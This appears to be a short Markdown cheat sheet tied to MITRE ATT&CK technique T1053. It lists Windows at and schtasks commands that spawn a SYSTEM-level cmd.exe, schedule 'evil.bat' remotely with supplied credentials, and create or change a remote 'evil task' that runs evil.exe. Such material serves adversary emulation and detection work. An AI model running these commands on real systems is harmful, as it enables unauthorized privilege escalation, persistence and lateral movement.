Matthew Green
48 lines
1.3 KiB
Markdown
48 lines
1.3 KiB
Markdown
## Scheduled Task
|
|
|
|
MITRE ATT&CK Technique: [T1053](https://attack.mitre.org/wiki/Technique/T1053)
|
|
|
|
### Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time
|
|
|
|
[Examples Of Creating Tasks](https://technet.microsoft.com/en-us/library/cc725744(v=ws.11).aspx#BKMK_create)
|
|
|
|
## at.exe
|
|
|
|
Note: deprecated in Windows 8+
|
|
|
|
### Privileged Escalation
|
|
|
|
This command can be used locally to escalate privilege to SYSTEM or be used across a network to execute commands on another system.
|
|
|
|
Input:
|
|
|
|
at 13:20 /interactive cmd
|
|
|
|
Example:
|
|
|
|
net use \\[computername|IP] /user:DOMAIN\username password
|
|
net time \\[computername|IP]
|
|
at \\[computername|IP] 13:20 c:\temp\evil.bat
|
|
|
|
## schtask.exe
|
|
|
|
### Launch Interactive cmd.exe
|
|
|
|
Input:
|
|
|
|
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
|
|
|
|
Input:
|
|
|
|
schtasks /create /tn "mysc" /tr C:\windows\system32\cmd.exe /sc ONLOGON /ru "System"
|
|
|
|
### Remote Scheduled Task
|
|
#### Create, modify, remove scheduled task (replace IP with target)
|
|
Input:
|
|
|
|
SCHTASKS /Create /S 127.0.0.1 /RU <DOMAIN>\<USER> /RP <Password> /TN "evil task" /TR "c:\Windows\System32\evil.exe" /SC daily /ST 17:00
|
|
|
|
Input:
|
|
|
|
SCHTASKS /Change /S 127.0.0.1 /RU <DOMAIN>\<USER> /RP <Password> /TN "evil task" /ST 17:01
|